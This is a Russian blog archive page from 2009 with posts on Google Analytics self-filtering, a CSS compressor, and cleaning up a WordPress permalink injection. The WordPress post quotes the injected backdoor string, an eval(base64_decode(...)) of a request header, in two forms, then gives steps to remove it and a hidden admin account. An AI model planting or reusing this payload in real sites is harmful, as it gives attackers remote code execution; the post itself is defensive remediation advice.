Archive for Сентябрь, 2009

25СенКак исключить свои посещения из статистики Google Analytics

Если вы используете Google Analytics для отслеживания статистики посещения ваших сайтов, бывает важно научить GA отслеживать и отфильтровывать ваши собственные посещения для получения реальной картины. В отличие от сервисов вроде Statcounter или Sitemeter, Google Analytics не умеет отфильтровывать ваши визиты, если у вас динамический IP.

Если у вас статический IP, достаточно будет обойтись его фильтрацией. Но в большинстве случаев пользователи имеют динамический IP, поэтому здесь понадобится другое решение.
Подробности далее

21СенОнлайновый CSS-компрессор

Интересный и весьма полезный веб-сервис для html/css-кодеров: CSS Compressor. Это небольшая онлайновая утилита по сжатию готового css-кода. Написанный css-код нужно ввести в текстовое поле, после чего выбрать один из 4 методов сжатия (низкий, средний, высокий, высочайший). На выбор также можно удалять обратные слэши (\) и точки с запятой (;), сжимать цвета, сортировать свойства и конвертировать селекторы в нижний регистр. После сжатия компрессор удалит ненужные пробелы и оптимизирует код, делая его таким образом меньше по объему и, соответственно, быстрее в загрузке. После процесса сжатия также доступна статистика – первоначальный размер css-кода и полученный после оптимизации.

05СенWordPress MySQL инъекция – как избежать атаки

Как оказалось, на днях многие блоги на WordPress были подвергнуты MySQL-инъекции, которая портит постоянные ссылки (пермалинки), превращая их, таким образом, в нерабочие. Это короткая статья о том, как исправить эту ситуацию.

Атакованные блоги подвергаются хаку, который добавляет к пермалинку

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

После этого пермалинк, конечно, перестает работать и получить доступ к посту можно, только если удалить этот добавленный код.

Лечение:

1. Перейти в админке к Setting->Permalinks и удалить вышеуказанный код.
2. Перейти к пользователям, там обнаружится больше пользователей с административными правами, чем обычно.
3. Провести мышкой над каждым, чтобы вычислить последнего зарегистрировавшегося.
4. У этого пользователя правым кликом скопировать ссылку Редактирование/Edit и вставить его в адресную строку, увеличить номер на 1.
5. Вы должны получить скрытого админа со странным кодом в поле Имя. Удалите код, чтобы понизить его статус до Подписчика, затем снова перейдите к Пользователям и удалите его.

На этом все. Не забывайте вовремя обновляться до последних версий.




Спонсоры: